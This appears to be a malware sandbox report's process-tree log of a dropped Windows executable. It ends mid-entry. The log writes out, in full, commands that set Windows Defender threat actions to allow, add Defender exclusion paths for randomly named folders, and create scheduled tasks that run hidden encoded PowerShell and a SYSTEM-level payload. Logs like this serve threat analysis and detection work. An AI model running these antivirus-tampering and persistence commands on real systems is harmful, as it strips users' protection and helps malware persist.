forfiles /p c:\windows\system32 /m notepad.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737010 ThreatIDDefaultAction_Actions=6 Force=True"
3⤵
PID:1516

C:\Windows\SysWOW64\cmd.exe
/C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737010 ThreatIDDefaultAction_Actions=6 Force=True
4⤵
PID:3236

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737010 ThreatIDDefaultAction_Actions=6 Force=True
5⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
PID:3984

C:\Windows\SysWOW64\Wbem\WMIC.exe
"C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737010 ThreatIDDefaultAction_Actions=6 Force=True
6⤵
PID:3796

C:\Windows\SysWOW64\forfiles.exe
forfiles /p c:\windows\system32 /m notepad.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737007 ThreatIDDefaultAction_Actions=6 Force=True"
3⤵
PID:1088

C:\Windows\SysWOW64\cmd.exe
/C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737007 ThreatIDDefaultAction_Actions=6 Force=True
4⤵
PID:1920

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737007 ThreatIDDefaultAction_Actions=6 Force=True
5⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
PID:1272

C:\Windows\SysWOW64\Wbem\WMIC.exe
"C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737007 ThreatIDDefaultAction_Actions=6 Force=True
6⤵
PID:976

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:64;"
2⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
PID:3876

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:32
3⤵
PID:2172

C:\Windows\SysWOW64\reg.exe
REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:32
4⤵
PID:3968

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:64
3⤵
PID:3960

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:32
3⤵
PID:2140

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:64
3⤵
PID:1512

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:32
3⤵
PID:3088

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:64
3⤵
PID:3796

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:32
3⤵
PID:1452

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:64
3⤵
PID:960

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:32
3⤵
PID:2728

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:64
3⤵
PID:2120

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:32
3⤵
PID:1516

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:64
3⤵
PID:4016

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:32
3⤵
PID:2540

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:64
3⤵
PID:1292

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:32
3⤵
PID:2176

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:64
3⤵
PID:4072

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:32
3⤵
PID:2572

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:64
3⤵
PID:204

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:32
3⤵
PID:636

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:64
3⤵
PID:1920

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\VnDWhryCSIE\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\VnDWhryCSIE\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\XpqoUDXlJoUn\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\XpqoUDXlJoUn\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\kuGFoFUJyZFbBZdRkpR\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\kuGFoFUJyZFbBZdRkpR\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\mrDIPifxyaTU2\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\mrDIPifxyaTU2\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\piLDiRqvGTKTC\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\piLDiRqvGTKTC\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\qDCCGhOyU\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\qDCCGhOyU\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\ProgramData\xoWQddOigjsPCTVB\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\ProgramData\xoWQddOigjsPCTVB\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\LocalLow\zVCERlXqEUubX\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\LocalLow\zVCERlXqEUubX\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Temp\GGBXTQIHvxONXPngM\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Temp\GGBXTQIHvxONXPngM\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Windows\Temp\ONbcuvmDOvHMWTXn\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Windows\Temp\ONbcuvmDOvHMWTXn\" /t REG_DWORD /d 0 /reg:64;"
2⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
PID:3656

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\VnDWhryCSIE" /t REG_DWORD /d 0 /reg:32
3⤵
PID:2764

C:\Windows\SysWOW64\reg.exe
REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\VnDWhryCSIE" /t REG_DWORD /d 0 /reg:32
4⤵
PID:1820

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\VnDWhryCSIE" /t REG_DWORD /d 0 /reg:64
3⤵
PID:2172

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\XpqoUDXlJoUn" /t REG_DWORD /d 0 /reg:32
3⤵
PID:4052

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\XpqoUDXlJoUn" /t REG_DWORD /d 0 /reg:64
3⤵
PID:2576

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\kuGFoFUJyZFbBZdRkpR" /t REG_DWORD /d 0 /reg:32
3⤵
PID:3948

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\kuGFoFUJyZFbBZdRkpR" /t REG_DWORD /d 0 /reg:64
3⤵
PID:1512

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\mrDIPifxyaTU2" /t REG_DWORD /d 0 /reg:32
3⤵
PID:2044

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\mrDIPifxyaTU2" /t REG_DWORD /d 0 /reg:64
3⤵
PID:2164

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\piLDiRqvGTKTC" /t REG_DWORD /d 0 /reg:32
3⤵
PID:1916

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\piLDiRqvGTKTC" /t REG_DWORD /d 0 /reg:64
3⤵
PID:2752

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\qDCCGhOyU" /t REG_DWORD /d 0 /reg:32
3⤵
PID:3944

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\qDCCGhOyU" /t REG_DWORD /d 0 /reg:64
3⤵
PID:3984

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\ProgramData\xoWQddOigjsPCTVB /t REG_DWORD /d 0 /reg:32
3⤵
PID:3936

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\ProgramData\xoWQddOigjsPCTVB /t REG_DWORD /d 0 /reg:64
3⤵
PID:4060

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Users\Admin\AppData\LocalLow\zVCERlXqEUubX /t REG_DWORD /d 0 /reg:32
3⤵
PID:3560

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Users\Admin\AppData\LocalLow\zVCERlXqEUubX /t REG_DWORD /d 0 /reg:64
3⤵
PID:1736

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Users\Admin\AppData\Local\Temp\GGBXTQIHvxONXPngM /t REG_DWORD /d 0 /reg:32
3⤵
PID:1248

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Users\Admin\AppData\Local\Temp\GGBXTQIHvxONXPngM /t REG_DWORD /d 0 /reg:64
3⤵
PID:3576

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Windows\Temp\ONbcuvmDOvHMWTXn /t REG_DWORD /d 0 /reg:32
3⤵
PID:3540

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Windows\Temp\ONbcuvmDOvHMWTXn /t REG_DWORD /d 0 /reg:64
3⤵
PID:3608

C:\Windows\SysWOW64\schtasks.exe
schtasks /CREATE /TN "gCPVCUGHS" /SC once /ST 02:38:28 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="
2⤵
- Creates scheduled task(s)
PID:3552

C:\Windows\SysWOW64\schtasks.exe
schtasks /run /I /tn "gCPVCUGHS"
2⤵
PID:992

C:\Windows\SysWOW64\schtasks.exe
schtasks /DELETE /F /TN "gCPVCUGHS"
2⤵
PID:2368

C:\Windows\SysWOW64\schtasks.exe
schtasks /CREATE /TN "lJLWniCkwZbjhapzm" /SC once /ST 05:59:07 /RU "SYSTEM" /TR "\"C:\Windows\Temp\ONbcuvmDOvHMWTXn\cMoyCgwrTdLTZce\HgCFJXi.exe\" 7V /site_id 767 /S" /V1 /F
2⤵
- Drops file in Windows directory
- Creates scheduled task(s)
PID:3372

C:\Windows\SysWOW64\schtasks.exe
schtasks /run /I /tn "lJLWniCkwZbjhapzm"
2⤵
PID:2580

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==
1⤵
- Suspicious behavior: EnumeratesProcesses
PID:2088

C:\Windows\system32\gpupdate.exe
"C:\Windows\system32\gpupdate.exe" /force
2⤵
PID:2116

\??\c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k localsystemnetworkrestricted -s fhsvc
1⤵
PID:3592

\??\c:\windows\system32\gpscript.exe
gpscript.exe /RefreshSystemParam
1⤵
PID:2748

C:\Windows\Temp\ONbcuvmDOvHMWTXn\cMoyCgwrTdLTZce\HgCFJXi.exe
C:\Windows\Temp\ONbcuvmDOvHMWTXn\cMoyCgwrTdLTZce\HgCFJXi.exe 7V /site_id 767 /S
1⤵
- Executes dropped EXE
- Drops desktop.ini file(s)
- Drops file in Program Files directory
- Modifies Internet Explorer settings
- Modifies data under HKEY_USERS
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
PID:2884

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m notepad.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147735503 ThreatIDDefaultAction_Actions=6 Force=True" & forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737010 ThreatIDDefaultAction_Actions=6 Force=True" & forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737007 ThreatIDDefaultAction_Actions=6 Force=True" &
2⤵
PID:1248

C:\Windows\SysWOW64\forfiles.exe
forfiles /p c:\windows\system32 /m notepad.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147735503 ThreatIDDefaultAction_Actions=6 Force=True"
3⤵
PID:4084

C:\Windows\SysWOW64\cmd.exe
/C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147735503 ThreatIDDefaultAction_Actions=6 Force=True
4⤵
PID:2556

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147735503 ThreatIDDefaultAction_Actions=6 Force=True
5⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
PID:4068

C:\Windows\SysWOW64\Wbem\WMIC.exe
"C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147735503 ThreatIDDefaultAction_Actions=6 Force=True
6⤵
PID:3964

C:\Windows\SysWOW64\forfiles.exe
forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737010 ThreatIDDefaultAction_Actions=6 Force=True"
3⤵
PID:1752

C:\Windows\SysWOW64\cmd.exe
/C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737010 ThreatIDDefaultAction_Actions=6 Force=True
4⤵
PID:1556

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737010 ThreatIDDefaultAction_Actions=6 Force=True
5⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
PID:640

C:\Windows\SysWOW64\Wbem\WMIC.exe
"C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737010 ThreatIDDefaultAction_Actions=6 Force=True
6⤵
PID:3980

C:\Windows\SysWOW64\forfiles.exe
forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737007 ThreatIDDefaultAction_Actions=6 Force=True"
3⤵
PID:1812

C:\Windows\SysWOW64\cmd.exe
/C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737007 ThreatIDDefaultAction_Actions=6 Force=True
4⤵
PID:4036

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737007 ThreatIDDefaultAction_Actions=6 Force=True
5⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
PID:1640

C:\Windows\SysWOW64\Wbem\WMIC.exe
"C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737007 ThreatIDDefaultAction_Actions=6 Force=True
6⤵
PID:1840

C:\Windows\SysWOW64\schtasks.exe
schtasks /DELETE /F /TN "bkckNrBYOjfprwtEPo"
2⤵
PID:2368

C:\Windows\SysWOW64\cmd.exe
cmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:32
2⤵
PID:3372

C:\Windows\SysWOW64\reg.exe
REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:32
3⤵
PID:2580

C:\Windows\SysWOW64\cmd.exe
cmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:64
2⤵
PID:3356

C:\Windows\SysWOW64\reg.exe
REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:64
3⤵
PID:1428

C:\Windows\SysWOW64\schtasks.exe
